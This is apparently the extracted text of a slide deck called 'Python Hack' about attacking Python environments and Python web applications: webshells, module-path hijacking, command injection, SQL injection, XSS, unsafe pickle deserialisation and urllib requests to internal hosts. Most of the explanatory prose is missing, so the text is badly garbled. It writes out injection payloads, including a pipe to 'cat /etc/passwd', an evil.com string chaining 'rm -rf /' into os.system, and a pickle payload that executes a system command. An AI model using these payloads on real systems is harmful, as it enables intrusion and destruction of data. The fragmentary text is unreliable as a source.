Python Hack
() @ 

ID
@
Web 


Python Python Hack
1. 2. 3. PythonWeb*

Python

{`Python' : [`', `', `', `', `', `', `', `etc.']}
PythonGuido van Rossum

{`' : [`', `', `', `', `', `', `', `Web', `etc.']}

Python

Python Hack

1. 
Pythonweb PythonPythonWebshell  ......

1. 
...

1. 
...

1. 
Webshell
https://github.com/evilcos/python-webshell

2. 
Python 

2. 
Python
 -> sys.path
sys.path
['', '/usr/lib/python2.6', '/usr/lib/python2.6/plat-linux2', '/usr/lib/python2.6/lib-tk', '/usr/lib/python2.6/lib-old', '/usr/lib/python2.6/lib-dynload', '/usr/local/lib/python2.6/dist-packages', '/usr/lib/python2.6/dist-packages', '/usr/lib/python2.6/dist-packages/PIL', '/usr/lib/python2.6/dist-packages/gst-0.10', '/usr/lib/pymodules/python2.6', '/usr/lib/python2.6/dist-packages/gtk-2.0', '/usr/lib/pymodules/python2.6/gtk-2.0']

2. 
Pythonos.py  


2. 
os.pyimport

3. PythonWeb
0x01. OS

3. PythonWeb
OS
evalos.system()os.popen*subprocess.popen os.spawn*commands.*popen2.*pickle
Djangodemo

3. PythonWeb
google.com

3. PythonWeb
| google.com|cat /etc/passwd

3. PythonWeb
os.system os.system('python exp.py -u http://evil.com')  a
<a href="http://evil.com|rm -rf / &"></a>
os.system('python exp.py -u http://evil.com|rm -rf / &')

3. PythonWeb
?   ->  sqlmap
hispider.html

3. PythonWeb
urllist sqlmapsql inj

3. PythonWeb


3. PythonWeb
pickle import pickle pickle.loads()
loads import pickle pickle.loads("cos\nsystem\n(S'ifconfig'\ntR.")

3. PythonWeb

http://nadiana.com/python-pickle-insecure

3. PythonWeb
0x02. SQL

3. PythonWeb
Djangopythonweb (open source web framework), MVC
DjangoSQL 

3. PythonWeb
PythonDjango
id SQLSQL

3. PythonWeb
DjangoAPI

3. PythonWeb
0x03. XSS

3. PythonWeb
XSS


3. PythonWeb
0x04. 

3. PythonWeb


3. PythonWeb
urllib/urllib2
http://10.1.14.2:7890/req

3. PythonWeb
URL

3. PythonWeb
 :) file

3. PythonWeb



3. PythonWeb
 http://10.1.14.3/urllib2_poc.php urllib2_poc.php 

3. PythonWeb

· /Q&A
 Python PHP
 

Thanks
@

